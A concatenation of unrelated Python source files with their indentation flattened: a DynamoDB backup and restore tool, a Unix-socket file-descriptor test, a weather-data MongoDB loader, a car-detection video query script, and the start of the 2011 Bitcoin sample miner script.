original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " +
str(write_capacity))
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args['LocalSecondaryIndexes'] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args['GlobalSecondaryIndexes'] = table_global_secondary_indexes
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info("Control plane limit exceeded, "
"retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
write_capacity,
False)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + os.sep + source_table +
os.sep + DATA_DIR + os.sep)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
" items to " + destination_table + "..")
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if int(write_capacity) != original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != wcu:
gsi_data.append({
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits":
int(rcu),
"WriteCapacityUnits": int(original_gsi_write_capacity)
}
}
})
logging.info("Updating " + destination_table +
" global secondary indexes write capacities as necessary..")
while True:
try:
dynamo.update_table(TableName=destination_table,
global_secondary_index_updates=gsi_data)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table +
" table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " +
str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
"If unset, don't create archive", choices=["zip", "tar"])
parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
"[must already exist]")
parser.add_argument("-m", "--mode", help="Operation to perform",
choices=["backup", "restore", "empty"])
parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '" +
LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB "
"[required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
"[required only for local]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
"e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]")
parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
"[optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn: DynamodbClient = _get_aws_client(
service='dynamodb',
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn: DynamodbClient = _get_aws_client(
service='dynamodb',
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn: DynamodbClient = _get_aws_client(
service='dynamodb',
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to backup: " +
", ".join(matching_backup_tables))
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
kwargs={"tableQueue": q})
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info("Backup of table(s) " +
", ".join(matching_backup_tables) + " completed!")
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(args.profile,
args.region,
args.bucket,
archive_file)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) +
" table(s) in DynamoDB host" + delete_str +
", ".join(matching_destination_tables))
threads = []
for table in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) +
" table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity))
else:
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table,
change_prefix(source_table,
args.srcTable,
dest_table,
prefix_separator),
args.writeCapacity))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " +
dest_table + " completed!")
else:
delete_table(
conn=conn,
sleep_interval=sleep_interval,
table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to empty: " +
", ".join(matching_backup_tables))
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
|
ancillary.py
|
from filedes.test.base import BaseFDTestCase
from filedes.socket.unix import make_unix_stream_socket, connect_unix_stream_socket
from filedes import FD
import unittest2
import _ancillary
import os
import warnings
import time
import threading
import multiprocessing
class TestAncillary(BaseFDTestCase):
def tempnam(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
return os.tempnam(None, 'uxs')
def fdTestCommon(self, send_f, recv_f):
SN = self.tempnam()
def worker():
pid = os.getpid()
while True:
try:
f1 = connect_unix_stream_socket(SN)
break
except:
time.sleep(0.05)
r, w = recv_f(f1, 2)
os.write(w, "OK:%d" % pid)
os.close(r)
os.close(w)
def acceptor(r, w):
f0 = make_unix_stream_socket(SN)
f0.listen(1024)
# Accept a single connection, then we're done
conn, address = f0.accept()
send_f(conn, [r, w])
p1 = multiprocessing.Process(target=worker)
p1.start()
r, w = os.pipe()
t = threading.Thread(target=acceptor, args=(r, w))
t.setDaemon(True)
t.start()
msg = os.read(r, 1024)
msg, pid = msg.split(":")
self.assertEquals(msg, "OK")
self.assertEquals(int(pid), p1.pid)
self.assertNotEquals(int(pid), os.getpid())
os.close(r)
os.close(w)
p1.join()
self.assertEquals(p1.exitcode, 0)
t.join()
def testAncillarySendRecvFDs(self):
def send(sock, fds):
_ancillary.send_fds(sock.fileno(), fds)
def recv(sock, n_fds):
return _ancillary.recv_fds(sock.fileno(), n_fds)
self.fdTestCommon(send, recv)
def testAncillarySendRecvFD(self):
def send(sock, fds):
for fd in fds:
_ancillary.send_fd(sock.fileno(), fd)
def recv(sock, n_fds):
result = []
for i in xrange(n_fds):
result.append(_ancillary.recv_fd(sock.fileno()))
return result
self.fdTestCommon(send, recv)
def testFiledesSocketSendRecvFDs(self):
def send(sock, fds):
FD(sock).socket.send_fds(fds)
def recv(sock, n_fds):
return FD(sock).socket.recv_fds(n_fds)
self.fdTestCommon(send, recv)
def testFiledesSocketSendRecvFD(self):
def send(sock, fds):
for fd in fds:
FD(sock).socket.send_fd(fd)
def recv(sock, n_fds):
result = []
for i in xrange(n_fds):
result.append(FD(sock).socket.recv_fd())
return result
self.fdTestCommon(send, recv)
if __name__ == '__main__':
unittest2.main()
|
load_db.py
|
import src.mongoDBI as mongoDBI
import os
import src.constants as constants
import src.utils as utils
import glob
import src.parse_grb_files as parse_grb_files
from multiprocessing import Process
from datetime import datetime, timedelta, date
# ---------------------------------------------------------------#
class buffer:
buffer = None
max_buffer_count = 25
dbi = None
def __init__(self, db_name):
self.dbi = mongoDBI.mongoDBI(db_name)
self.buffer = { }
for t in constants.mongo_db_tables:
self.buffer[t] = []
def insert_to_buffer(self, table, dict):
self.buffer[table].append(dict)
return;
def write_buffer(self):
cur_len = len(self.buffer[constants.mongo_db_tables[0]])
if cur_len < self.max_buffer_count:
return;
self.dbi.insert_bulk(self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[t] = []
return;
# data_map : dictionary
# 1st entry is the date or year_week id
def insert_to_db(self, data_map, label=constants.label_date):
if data_map is None or len(data_map) == 0:
return;
id = data_map[label]
data_map.pop(label, None)
for table, data in data_map.iteritems():
# print 'in insert to db... table:'+table
key_label = label
key_contents = id
value_label = constants.label_value
value_contents = data
dict = mongoDBI.mongoDBI.get_insert_dict(key_label, key_contents, value_label, value_contents)
self.insert_to_buffer(table, dict)
self.write_buffer()
return;
def flush(self):
self.dbi.insert_bulk(self.buffer)
# Empty buffer
for t in constants.mongo_db_tables:
self.buffer[t] = []
return;
# ------------------------ END OF CLASS ------------------------#
# ---------------------------------------------------------------#
# AUXILLARY FUNCTIONS
# ---------------------------------------------------------------#
#
# Input : year
# Function :
# Inserts into db, data for each date, daily mean
#
def process_year_by_date_mean(year):
# print 'Processing year : ' + str(year)
cur_day = utils.get_current_day()
cur_year = utils.get_current_year()
buffer_obj = buffer(constants.db_name_date_mean)
dir = str(year)
if not os.path.exists(dir):
return;
os.chdir(dir)
start_day = constants.gdas_min_day
if year == cur_year:
end_day = cur_day
else:
end_day = constants.gdas_max_day
# Process the files for a single day
for day in range(start_day, end_day + 1):
dir = str(day).zfill(3)
if not os.path.exists(dir):
continue;
try:
os.chdir(dir)
files = glob.glob("gdas*z")
data = parse_grb_files.parse_files_by_date_mean(files)
buffer_obj.insert_to_db(data, label=constants.label_date)
os.chdir("../")
except:
pass
os.chdir("../")
os.chdir("../")
buffer_obj.flush()
#
# Process complete data (4 per day) of each date, of the given year
#
def process_year_by_date_complete(year):
cur_day = utils.get_current_day()
cur_year = utils.get_current_year()
buffer_obj = buffer(constants.db_name_date_complete)
dir = str(year)
if not os.path.exists(dir):
return;
os.chdir(dir)
start_day = constants.gdas_min_day
if year == cur_year:
end_day = cur_day
else:
end_day = constants.gdas_max_day
# Process the files for a single day
for day in range(start_day, end_day + 1):
dir = str(day).zfill(3)
if not os.path.exists(dir):
continue;
try:
os.chdir(dir)
files = glob.glob("gdas*z") # get list of data
data = parse_grb_files.parse_files_by_date_complete(files)
for data_element in data:
buffer_obj.insert_to_db(data_element, label=constants.label_date_idx)
os.chdir("../")
except:
pass
os.chdir("../")
os.chdir("../")
buffer_obj.flush()
# ------------------------------------------------------------------#
#
# load data by mean of a day
# all years
#
def load_all_years_by_date_mean( ):
cur_year = utils.get_current_year()
os.chdir(constants.data_dir)
os.chdir(constants.gdas_data_dir)
years = range(constants.gdas_start_year, cur_year + 1)
process_pool = []
for year in years:
p = Process(target=process_year_by_date_mean, args=(year,))
process_pool.append(p);
for p in process_pool:
p.start()
for p in process_pool:
p.join()
return;
# ------------------------------------------------------------------#
#
# load into db by a single date
# date string format must be : yyyy-mm-dd
#
def load_by_one_date(date_str):
os.chdir(constants.data_dir)
os.chdir(constants.gdas_data_dir)
format = '%Y-%m-%d'
tmp = datetime.strptime(date_str, format)
today = datetime.now()
# check if date is in future, if so return
if today < tmp:
print
'Date given is in future!!!'
return;
buffer_obj = buffer()
day = tmp.timetuple().tm_yday
year = tmp.year
dir = str(year)
os.chdir(dir)
dir = str(day).zfill(3)
os.chdir(dir)
files = glob.glob("gdas*z")
data = parse_grb_files.parse_files(files)
buffer_obj.insert_to_db(data, label=constants.label_date)
buffer_obj.flush()
os.chdir("../")
os.chdir("../")
return
# ---------------------------------------------------------------#
#
# Load into db aggregate data of 7 days
# start_date : Gregorian date ,start. Type : Datetime Object
# end_date : Gregorian date ,end . Type : Datetime Object
# week_number : ISO week number , refer ISO calendar. Type : int
# year : ISO year , refer ISO calendar. Type : int
# DB : Weather_week_mean
#
def load_by_week_mean(start_date, iso_year, iso_week):
today = datetime.now()
format = '%Y-%m-%d'
start_date = datetime.strptime(start_date, format)
# check if date is in future, if so return
if today < start_date:
# DEBUG
# print 'Date given is in future!!!'
return;
file_path_dict = { }
for weekday in range(0, 7, 1):
cur = start_date + timedelta(days=weekday)
if cur > today:
break;
day = cur.timetuple().tm_yday
year = cur.year
yr_dir = str(year)
try:
os.chdir(yr_dir)
day_dir = str(day).zfill(3)
try:
os.chdir(day_dir)
files = glob.glob("gdas*z")
path = yr_dir + '/' + day_dir + '/.'
file_path_dict[path] = files
os.chdir("../")
except:
pass
os.chdir("../")
except:
pass
buffer_obj = buffer(constants.db_name_week_mean)
data = parse_grb_files.parse_files_by_week(file_path_dict, iso_year=iso_year, iso_week=iso_week)
buffer_obj.insert_to_db(data, label=constants.year_week_label)
buffer_obj.flush()
return;
# ---------------------------------------------------------------#
#
# Load complete data for each date into db
#
def load_by_date_complete( ):
cur_year = utils.get_current_year()
os.chdir(constants.data_dir)
os.chdir(constants.gdas_data_dir)
years = range(constants.gdas_start_year, cur_year + 1)
process_pool = []
for year in years:
p = Process(target=process_year_by_date_complete, args=(year,))
process_pool.append(p)
for p in process_pool:
p.start()
for p in process_pool:
p.join()
return;
|
VideoQueryProcessor.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 14 16:45:29 2020
@author: ajink / manivs
"""
import cv2
import csv
import argparse
from DetectColour import DetectColour
from DetectCar import DetectCar
# Begin Mani
from datetime import datetime
import time
from DetectCartype import DetectCartype
from multiprocessing import Process, Queue
# End
#Begin Mani
video = "./video.mp4"
#End
#Create an object of detect car class
detect_car = DetectCar()
#Create an object of detect colour class
detect_colour =DetectColour()
#Start Mani
detect_cartype = DetectCartype()
def wirteData(csv_file,csv_columns,dict_data):
#csv writer logic
try:
print("Writing Data")
with open(csv_file, 'w',newline='') as csvfile:#Open csv file
writer = csv.DictWriter(csvfile, fieldnames=csv_columns)#create CSV writer object
writer.writeheader()#Wirite coloum header
for data in dict_data:#loop thru list of dictionaries
writer.writerow(data)#Write dict as row
except IOError:
print("I/O error")
#-------------------------------------
#Video to frame converter
#-------------------------------------
def videoFrame(frame_queue):
frame_no = 1
video_capture = cv2.VideoCapture(video)#Open Video
while video_capture.isOpened():#read whilte video is open
ret, frame = video_capture.read()#read each frame
if ret == True:
#Write images on output location
#cv2.imwrite('C:\\Users\\ajink\\RTAIAssignment2\\car_detection_in_video-master\\out\\'+str(frame_no)+'.jpg',frame)
frame_queue.put(frame)#fass frame to frame quque
print(frame_no)#print frame no
frame_no+=1#increase frame count
if cv2.waitKey(25) & 0xFF == ord('q'):
break
else:
break
#Once the video is over release video capture
video_capture.release()
# Closes all the windows
cv2.destroyAllWindows()
#-------------------------------------
#Target function for Q1
#-------------------------------------
def videoProcessorQ1(frame_queue1,frame_queue_1,frame_queue_2,r1):
frame_no = 1
result=[]
while True:
objectCount={}#Define result dectionary for frame
if (frame_queue1.empty()==False):#process while queue is empty
frame1=frame_queue1.get()#Get item(Frame) from queue
seconds = datetime.now()#get current time
frame_details = detect_car.detect_Car(frame_no, frame1)#Get details of the frame using carDetect class
frame_queue_1.put(frame_details)#put details in colour detection queue
frame_queue_2.put(frame_details)#put details in type detection queue
car_count=len(frame_details.getObjects())#Find count of cars in frame
objectCount["FNo"]=frame_no#append frame bo to result dectionary for frame
frame_no+=1#Increase frame number count
objectCount["ObjectCount"]=car_count#append object count result dectionary for frame
seconds1 = datetime.now()#End time
t=seconds1-seconds#time diffrence
objectCount["Time"]=t.total_seconds()*1000#set time to result dictionary as microseconds
result.append(objectCount)#Append each frame result to fial result list
r1.put(objectCount)#Put frame result in result1 queue
else:
if frame_no >=1495:#If frame count is more than 1495 write results on file and break
wirteData("Q1.csv",['FNo', 'ObjectCount', 'Time'],result)
break
else:
pass
#-------------------------------------
#Target function for Q2
#-------------------------------------
def videoProcessorQ3(frame_queue1,r2):
frame_no=1
result=[]
while True:
objectCount={}
colour_list=[]
if (frame_queue1.empty()==False):#process while queue is empty
seconds = datetime.now()#get current time
frame_details=frame_queue1.get()#Get item(Frame) from queue
car_count=len(frame_details.getObjects())#Find count of cars in frame
objectCount["FNo"]=frame_no#append frame bo to result dectionary for frame
frame_no+=1#Increase frame number count
objectCount["ObjectCount"]=car_count#append object count result dectionary for frame
if car_count<1:#if count is less than one
seconds1 = datetime.now()#get current time
t=seconds1-seconds#time diffrence
objectCount["Time"]=t.total_seconds()*1000#set time to result dictionary as microseconds
objectCount["ObjectColour"]="NA"#Set coulor to NA
else:
for bounding_box in frame_details.getObjects():#For each object in given frame
#Get the hsv value of given image
hsv=detect_colour.get_hsv(bounding_box)
#Get the colour of object(Car) from image
colour=detect_colour.get_colour(hsv)
colour_list.append(colour)#Append the colour to list
seconds1 = datetime.now()
objectCount["ObjectColour"]=colour_list
t=seconds1-seconds#time diffrence
objectCount["Time"]=t.total_seconds()*1000#set time to result dictionary as microseconds
result.append(objectCount)#Append each frame result to fial result list
r2.put(objectCount)#Put frame result in result2 queue
else:
if frame_no >=1495:#If frame count is more than 1495 write results on file and break
wirteData("Q3.csv",['FNo', 'ObjectCount', 'Time',"ObjectColour"],result)
break
else:
pass
#-------------------------------------
#Target function for Q3
#-------------------------------------
def videoProcessorQ2(frame_queue1,r3):
frame_no=1
result=[]
while True:
objectCount={}
car_list=[]
if (frame_queue1.empty()==False):#process while queue is empty
seconds = datetime.now()#get current time
frame_details=frame_queue1.get()#Get item(Frame) from queue
car_count=len(frame_details.getObjects())#Find count of cars in frame
objectCount["FNo"]=frame_no#append frame bo to result dectionary for frame
objectCount["ObjectCount"]=car_count#append object count result dectionary for frame
frame_no+=1#Increase frame number count
if car_count<1:#if count is less than one
seconds1 = datetime.now()#get current time
t=seconds1-seconds#time diffrence
objectCount["Time"]=t.total_seconds()*1000#set time to result dictionary as microseconds
objectCount["Type"]="NA"#Set type to NA
objectCount["Boxes"]="NA"#set bounding boxes to NA
else:
for bounding_box in frame_details.getObjects():#For each object in given frame
car_type = detect_cartype.predict_cartype(bounding_box)#Predict car type
if car_type == "Hatchback":
objectCount["Type"]=car_list#Set type
car_list.append(car_type)#append result to list
else:
objectCount["Type"]=car_list#Set type
car_list.append(car_type)#append result to list
seconds1 = datetime.now()#Find time now
objectCount["Boxes"]=frame_details.getRect()#set boxes
t=seconds1-seconds#get time diffrence
objectCount["Time"]=t.total_seconds()*1000#set time to result dictionary as microseconds
result.append(objectCount)
r3.put(objectCount)
else:
if frame_no >=1495:#If frame count is more than 1495 write results on file and break
wirteData("Q2.csv",['FNo', 'ObjectCount', 'Time',"Type","Boxes"],result)
break
else:
pass
#print("\nWaiting for item in Q3 queue\n")
#-------------------------------------
#Target function for Printing data
#-------------------------------------
def printData(Query,r1,r2,r3):
frame_no=1
results=[]
resultsT=[]
while True:
times={}#get timees dictionary
colour_types = { 'Black':0,
'Silver':0,
'Red':0,
'White':0,
'Blue':0
}
#initialize result row
result_row = { "FrameNo":frame_no,
"Sedan": colour_types.copy(),
"Hatchback": colour_types.copy(),
"Total":0
}
if(r1.empty()==False):#check if queue is empty
r1_obj=r1.get()#get item from result1 queue
r2_obj=r2.get()#get item from result1 queue
r3_obj=r3.get()#get item from result1 queue
if Query==3:#Check query option
print("\n--------------")
print("Query fired:",Query)
print("--------------")
print("Frame No: "+str(r1_obj["FNo"])+"\nCar Count: "+str(r1_obj["ObjectCount"])+"\nCar Clolour: "+str(r2_obj["ObjectColour"])+"\nCar Type: "+str(r3_obj["Type"])+"\nQ3 Time: "+str(r1_obj["Time"]+r2_obj["Time"]+r2_obj["Time"]))
time.sleep(0.5)
elif Query==2:
print("\n--------------")
print("Query fired:",Query)
print("--------------")
print("Frame No: "+str(r1_obj["FNo"])+"\nCar Count: "+str(r1_obj["ObjectCount"])+"\nCar Type: "+str(r3_obj["Type"])+"\nQ2 Time: "+str(r1_obj["Time"]+r2_obj["Time"]))
time.sleep(0.5)
elif Query==1:
print("\n--------------")
print("Query fired:",Query)
print("--------------")
print("Frame No: "+str(r1_obj["FNo"])+"\nCar Count: "+str(r1_obj["ObjectCount"])+"\nQ1 Time: "+str(r1_obj["Time"]))
time.sleep(0.5)
times["Frame No"]=str(r1_obj["FNo"])#set frame no for times dict
times["Q1"]=int(r1_obj["Time"])#set Q1 time for times dict
times["Q2"]=int(r1_obj["Time"]+r3_obj["Time"])#set Q1+Q2 time for times dict
times["Q3"]=int(r1_obj["Time"]+r2_obj["Time"]+r3_obj["Time"])#set Q1+Q2+Q3 time for times dict
if r1_obj["ObjectCount"]<1:#If object count less than one
result_row["FrameNo"]=r1_obj["FNo"]
result_row["Total"]=r1_obj["ObjectCount"]
else:
for colour,ctype in zip(r2_obj["ObjectColour"],r3_obj["Type"]):
colour_types[colour]+=1
result_row[ctype]=colour_types.copy()
result_row["FrameNo"]=r1_obj["FNo"]
result_row["Total"]=r1_obj["ObjectCount"]
results.append(result_row)#append results
resultsT.append(times)#append time results
frame_no+=1#increase frame count
else:#If frame count is more than 1495 write results on file and break
if frame_no >=1494:
with open('predictions.csv', 'w', newline='') as f:
writer = csv.writer(f)
for result_row in results:
csv_row = []
csv_row.append(result_row["FrameNo"])
for colour_count in result_row["Sedan"].values():
csv_row.append(colour_count)
for colour_count in result_row["Hatchback"].values():
csv_row.append(colour_count)
csv_row.append(result_row["Total"])
writer.writerow(csv_row)
wirteData("Times.csv",['Frame No', 'Q1', 'Q2',"Q3"],resultsT)
break
else:
print("\nWaiting for items\n")
def main():
# Get arguments from command line ...
parser = argparse.ArgumentParser()
parser.add_argument("-q", "--query",
help="query")
args = parser.parse_args()
Query=int(args.query)#Convert command line arg to int
print(type(Query))
frame_queue = Queue()#Create Frame queue
frame_queue_1 = Queue()#Creare Queue for Query 2
frame_queue_2 = Queue()#Creare Queue for Query 3
r1 = Queue()#Queue for result of Q1
r2 = Queue()#Queue for result of Q2
r3 = Queue()#Queue for result of Q3
p1=Process(target=videoFrame, args=(frame_queue,))#Create process for video to frame conversion
#Create process for Q1
p2=Process(target=videoProcessorQ1, args=(frame_queue,frame_queue_1,frame_queue_2,r1))
#Create process for Q2
p3=Process(target=videoProcessorQ3, args=(frame_queue_1,r2))
#Create process for Q3
p4=Process(target=videoProcessorQ2, args=(frame_queue_2,r3))
#Create process for printing results
p5=Process(target=printData, args=(Query,r1,r2,r3))
#Start process P1
p1.start()
#Sleep for 2 sec
time.sleep(2)
#Start process P2
p2.start()
print("Q1 Start")
#Start process P3
p3.start()
print("Q2 Start")
#Start process P4
p4.start()
print("Q3 Start")
time.sleep(4)
#Join all processes
p5.start()
p1.join()
p2.join()
p3.join()
p4.join()
if __name__ == "__main__":
print("Start")
#Get initial time
seconds = time.time()
#Call main
main()
#get end time of execution
seconds1 = time.time()
print("-->Total time taken:",seconds1-seconds)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
